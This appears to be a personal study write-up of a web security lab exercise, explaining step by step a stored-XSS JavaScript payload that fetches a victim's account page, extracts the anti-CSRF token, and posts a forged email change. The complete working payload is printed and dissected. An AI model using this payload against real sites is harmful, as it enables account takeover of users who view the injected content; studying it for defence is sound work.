##### **Detailed Breakdown of the Exploit: Leveraging XSS to Bypass Anti-CSRF Tokens**
The provided JavaScript exploit payload demonstrates sophisticated exploitation of **stored XSS** to perform an unauthorized action (email address change) bypassing the site's **Anti-CSRF protection**.
Here's the original payload explained clearly and systematically:
```html
<script>
var req = new XMLHttpRequest();
req.onload = handleResponse;
req.open('get', '/my-account', true);
req.send();
function handleResponse() {
var token = this.responseText.match(/name="csrf" value="(\w+)"/)[1];
var changeReq = new XMLHttpRequest();
changeReq.open('post', '/my-account/change-email', true);
changeReq.send('csrf=' + token + '&
[email protected]');
};
</script>
```
---
##### **Step-by-Step Exploit Explanation**
### 1️⃣ **Initial XMLHttpRequest (GET /my-account)**
The first step of the exploit uses JavaScript's XMLHttpRequest object to perform a silent, background HTTP GET request to fetch the victim’s personal user account page (`/my-account`):
```javascript
var req = new XMLHttpRequest();
req.onload = handleResponse; // Set callback when response is received
req.open('get', '/my-account', true); // Method, URL, async=true
req.send(); // Execute request
```
**Why this works:**
- Victims viewing the malicious comment have an active session. Their browser sends session cookies automatically with the request due to Same-Origin Policy (SOP), authenticating the request as legitimate.
- This request silently retrieves the HTML content of `/my-account`.
---
### 2️⃣ **Extracting the Anti-CSRF Token from Response**
The application protects POST requests (`/my-account/change-email`) with a hidden **CSRF token** within a form element, typically like:
```html
<input type="hidden" name="csrf" value="RANDOM_TOKEN_VALUE">
```
The exploit cleverly parses this token from the page source:
```javascript
function handleResponse() {
var token = this.responseText.match(/name="csrf" value="(\w+)"/)[1];
```
![[CleanShot 2025-04-12 at 13.06.54.png]]
**Token Extraction Explained:**
- `this.responseText` contains the full HTML page content fetched from `/my-account`.
- A JavaScript regex (`/name="csrf" value="(\w+)"/`) matches the hidden token’s value attribute.
- `(\w+)` captures the token as a group, accessible via `[1]`.
- The captured CSRF token is stored in the `token` variable.
**Example of responseText snippet:**
```html
<input required type="hidden" name="csrf" value="0ZkLZ7bmyhBj71e4YFky15MAN4NpyBdH">
```
---
### 3️⃣ **Forged POST Request with Captured Token (Email Change)**
With the valid CSRF token extracted, the exploit issues a POST request directly to `/my-account/change-email`:
```javascript
var changeReq = new XMLHttpRequest();
changeReq.open('post', '/my-account/change-email', true);
changeReq.send('csrf=' + token + '&
[email protected]');
```
**Details of the Forged Request:**
- Sends a POST request to `/my-account/change-email`.
- Includes the legitimate extracted CSRF token (`csrf=VALID_TOKEN`).
- Submits a malicious parameter: `
[email protected]`.
- The victim’s authenticated session cookie automatically accompanies the request, fulfilling the site's authentication and CSRF validation logic.
**Why the exploit bypasses Anti-CSRF protection:**
- The CSRF protection mechanism is based on tokens meant to be inaccessible to attackers.
- Using stored XSS, attackers execute JavaScript in the victim’s browser context, making the token directly retrievable and usable.
- The browser executes requests automatically, ensuring that session cookies and tokens are properly aligned, fulfilling all security checks.
---
### ⚠️ **Illustrative Example (Complete Attack Flow)**
![[CleanShot 2025-04-12 at 13.24.08.png]]